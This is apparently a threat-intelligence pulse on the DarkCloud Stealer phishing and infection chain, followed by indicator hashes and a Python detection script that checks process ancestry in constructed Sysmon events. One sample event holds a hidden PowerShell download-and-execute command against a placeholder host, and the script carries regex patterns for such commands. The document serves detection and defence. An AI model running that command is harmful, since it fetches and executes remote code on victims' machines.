Unit 42 researchers have identified a shift in the delivery method and obfuscation techniques used to distribute DarkCloud Stealer. The new infection chain, observed since April 2025, involves ConfuserEx obfuscation and a final payload written in Visual Basic 6. The attack begins with phishing emails carrying compressed archives (TAR, RAR or 7Z) that contain JavaScript or Windows Script files. These scripts download and execute a PowerShell script, which in turn drops an executable protected by ConfuserEx. The final payload is a VB6 executable injected into a legitimate process using RunPE techniques. The malware employs several obfuscation methods, including anti-tampering, symbol renaming and proxy call methods, to complicate analysis and evade detection.
Author: AlienVault
Related Tags:
confuserex
visual basic 6
DarkCloud Stealer
T1027.004
process hollowing
T1553.002
infection chain
T1059.005
anti-analysis
Associated Indicators:
F6D9198BD707C49454B83687AF926CCB8D13C7E43514F59EAC1507467E8FB140
9588C9A754574246D179C9FB05FEA9DC5762C855A3A2A4823B402217F82A71C1
FA598E761201582D41A73D174EB5EDAD10F709238D99E0BF698DA1601C71D1CA
24552408D849799B2CAC983D499B1F32C88C10F88319339D0EEC00FB01BB19B4
6B8A4C3D4A4A0A3AEA50037744C5FEC26A38D3FB6A596D006457F1C51BBC75C7
2BD43F839D5F77F22F619395461C1EEAEE9234009B475231212B88BD510D00B7
CE3A3E46CA65D779D687C7E58FB4A2EB784E5B1B4CEBE33DBB2BF37CCCB6F194
72D3DE12A0AA8CE87A64A70807F0769C332816F27DCF8286B91E6819E2197AA8
B90DF42F2218E59097A1DF29CF5B8C88BB2E7922
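The infection chain in the summary (archive member script, script host, PowerShell download stage, dropped ConfuserEx-protected executable) and the indicator list above both lend themselves to a small triage script. The following is an added example, not code from Unit 42 or AlienVault: it runs a process-ancestry check and an IOC hash lookup over constructed, hypothetical Sysmon Event ID 1 records. The command-line cues, the user-writable path pattern and the sample events are assumptions made for illustration; only the hash values are taken from the pulse.

```python
"""Triage helper for the DarkCloud Stealer delivery chain described above.

Added example, not Unit 42's or AlienVault's code. Two checks over
constructed Sysmon Event ID 1 (process create) records:
  1. process ancestry: script host run from an archive/temp path ->
     powershell.exe with a download cue -> executable in a user-writable path;
  2. hash lookup against the SHA-256/SHA-1 indicators listed in the pulse.
"""
import re

# Indicators copied from the pulse; the lone 40-hex value is a SHA-1.
IOC_HASHES = {h.lower() for h in (
    "F6D9198BD707C49454B83687AF926CCB8D13C7E43514F59EAC1507467E8FB140",
    "9588C9A754574246D179C9FB05FEA9DC5762C855A3A2A4823B402217F82A71C1",
    "FA598E761201582D41A73D174EB5EDAD10F709238D99E0BF698DA1601C71D1CA",
    "24552408D849799B2CAC983D499B1F32C88C10F88319339D0EEC00FB01BB19B4",
    "6B8A4C3D4A4A0A3AEA50037744C5FEC26A38D3FB6A596D006457F1C51BBC75C7",
    "2BD43F839D5F77F22F619395461C1EEAEE9234009B475231212B88BD510D00B7",
    "CE3A3E46CA65D779D687C7E58FB4A2EB784E5B1B4CEBE33DBB2BF37CCCB6F194",
    "72D3DE12A0AA8CE87A64A70807F0769C332816F27DCF8286B91E6819E2197AA8",
    "B90DF42F2218E59097A1DF29CF5B8C88BB2E7922",
)}

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Assumed cues of a download-and-execute PowerShell stage.
DOWNLOAD_CUES = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-expression|\biex\b|-enc", re.I)
# Assumed locations where extracted archive members and dropped files land.
USER_WRITABLE = re.compile(r"\\(temp|appdata|downloads|public)\\", re.I)
SCRIPT_EXT = re.compile(r"\.(js|jse|wsf|vbs|vbe)\b", re.I)


def hash_kind(h):
    """Classify a hex digest by length (the pulse mixes SHA-256 and SHA-1)."""
    h = h.strip().lower()
    if re.fullmatch(r"[0-9a-f]{64}", h):
        return "sha256"
    if re.fullmatch(r"[0-9a-f]{40}", h):
        return "sha1"
    if re.fullmatch(r"[0-9a-f]{32}", h):
        return "md5"
    return "unknown"


def hash_matches(h):
    return h.strip().lower() in IOC_HASHES


def base(image):
    return image.rsplit("\\", 1)[-1].lower()


def detect_chain(events):
    """Return (rule, ProcessGuid) hits for the delivery chain and IOC matches."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    hits = []
    for e in events:
        img = base(e["Image"])
        cmd = e.get("CommandLine", "")
        parent = by_guid.get(e.get("ParentProcessGuid"))
        pimg = base(parent["Image"]) if parent else ""
        # Stage 1: wscript/cscript executing a .js/.wsf/.vbs from a temp or profile path
        if img in SCRIPT_HOSTS and SCRIPT_EXT.search(cmd) and USER_WRITABLE.search(cmd):
            hits.append(("script_host_runs_script_from_user_path", e["ProcessGuid"]))
        # Stage 2: PowerShell spawned by the script host, optionally with a download cue
        if img in POWERSHELL and pimg in SCRIPT_HOSTS:
            rule = "script_host_to_powershell"
            if DOWNLOAD_CUES.search(cmd):
                rule += "_download"
            hits.append((rule, e["ProcessGuid"]))
        # Stage 3: PowerShell launching a freshly dropped executable
        if pimg in POWERSHELL and img not in POWERSHELL and USER_WRITABLE.search(e["Image"]):
            hits.append(("powershell_spawns_dropped_exe", e["ProcessGuid"]))
        # Sysmon "Hashes" field looks like "SHA256=...,SHA1=...,IMPHASH=..."
        for part in e.get("Hashes", "").split(","):
            if "=" in part and hash_matches(part.split("=", 1)[1]):
                hits.append(("ioc_hash_match", e["ProcessGuid"]))
                break
    return hits


# Constructed sample events (hypothetical; not from the report).
SAMPLE_EVENTS = [
    {"ProcessGuid": "A", "ParentProcessGuid": None,
     "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe"},
    {"ProcessGuid": "B", "ParentProcessGuid": "A",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\AppData\Local\Temp\Rar$DIa0.123\invoice.js"'},
    {"ProcessGuid": "C", "ParentProcessGuid": "B",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')\""},
    {"ProcessGuid": "D", "ParentProcessGuid": "C",
     "Image": r"C:\Users\alice\AppData\Roaming\loader.exe", "CommandLine": "loader.exe",
     "Hashes": "SHA256=F6D9198BD707C49454B83687AF926CCB8D13C7E43514F59EAC1507467E8FB140,IMPHASH=00000000000000000000000000000000"},
    {"ProcessGuid": "E", "ParentProcessGuid": None,
     "Image": r"C:\Windows\System32\svchost.exe", "CommandLine": "svchost.exe -k netsvcs",
     "Hashes": "SHA256=" + "0" * 64},
]

if __name__ == "__main__":
    for rule, guid in detect_chain(SAMPLE_EVENTS):
        print(f"{rule:40s} ProcessGuid={guid}")
```

The ancestry rules fire on behaviour, so they keep working after the operators rotate hashes; the IOC lookup is the cheap retroactive sweep. The RunPE step itself is not covered here, since the summary does not name the hollowed target process.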